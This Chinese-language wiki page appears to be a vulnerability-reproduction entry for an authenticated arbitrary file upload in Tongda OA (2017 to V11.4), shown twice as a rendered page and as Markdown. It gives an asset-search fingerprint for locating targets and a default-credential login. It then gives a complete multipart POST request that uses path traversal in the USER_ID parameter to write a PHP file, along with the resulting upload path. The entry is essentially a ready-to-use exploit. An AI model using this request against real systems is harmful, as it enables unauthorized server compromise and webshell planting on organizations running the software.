fofamini-wiki

登录白背景

源码

通达OA update存在后台文件上传漏洞

一、漏洞简介

通达OA是由北京通达信科科技有限公司自主研发的协同办公自动化系统，包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。后台**/general/hr/manage/staff_info/update.php**存在任意文件上传漏洞，用户可以通过上传任意文件到服务器中，并且可以借助上传的文件利用shell工具直接获得system权限。

二、影响版本

通达2017-通达V11.4

三、资产测绘

hunterapp.name="通达 OA"

登录页面

四、漏洞复现

1、使用默认密码admin，密码为空或采用通达OA任意用户登录登录后台；

通过上一步获取的cookie上传文件

POST /general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/1.php HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Cookie: {cookie}
Content-Type: multipart/form-data; boundary=00content0boundary00
Host: {hostname}
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 203
Connection: close

--00content0boundary00
Content-Disposition: form-data; name="ATTACHMENT"; filename="."

123
--00content0boundary00
Content-Disposition: form-data; name="submit"

保存
--00content0boundary00--

上传文件位置

/general/reportshop/workshop/report/attachment-remark/1.php

原文: https://www.yuque.com/xiaokp7/ocvun2/ln2mnw25xfifvsvw

# 通达OA update存在后台文件上传漏洞

# 一、漏洞简介
通达OA是由北京通达信科科技有限公司自主研发的协同办公自动化系统，包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。后台`**/general/hr/manage/staff_info/update.php**`存在任意文件上传漏洞，用户可以通过上传任意文件到服务器中，并且可以借助上传的文件利用shell工具直接获得system权限。

# 二、影响版本

- 通达2017-通达V11.4

# 三、资产测绘

- hunter`app.name="通达 OA"`

![image.png](./img/RnI_EFbO1UFFb_4M/1692175272185-2e2eccad-00b6-4598-a978-54d5b591d45a-482613.png)

- 登录页面

![image.png](./img/RnI_EFbO1UFFb_4M/1692175288340-990aa042-3b09-4cd8-8ae2-c55104f1b974-267947.png)

# 四、漏洞复现
1、使用默认密码admin，密码为空或采用通达OA任意用户登录登录后台；
![image.png](./img/RnI_EFbO1UFFb_4M/1683387160692-68b96b0e-ece1-4182-9c8c-3547689af283-994416.png)

2. 通过上一步获取的cookie上传文件
```
POST /general/hr/manage/staff_info/update.php?USER_ID=../../general/reportshop/workshop/report/attachment-remark/1.php HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Cookie: {cookie}
Content-Type: multipart/form-data; boundary=00content0boundary00
Host: {hostname}
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 203
Connection: close

--00content0boundary00
Content-Disposition: form-data; name="ATTACHMENT"; filename="."

123
--00content0boundary00
Content-Disposition: form-data; name="submit"

保存
--00content0boundary00--

```
![image.png](./img/RnI_EFbO1UFFb_4M/1703687263464-61f20cc1-fda2-4091-8ee8-b75f374e5baa-994858.png)
上传文件位置
```
/general/reportshop/workshop/report/attachment-remark/1.php
```
![image.png](./img/RnI_EFbO1UFFb_4M/1703687281830-7cf804d5-1f48-4ed2-a9e6-0a40bf34d608-242993.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ln2mnw25xfifvsvw>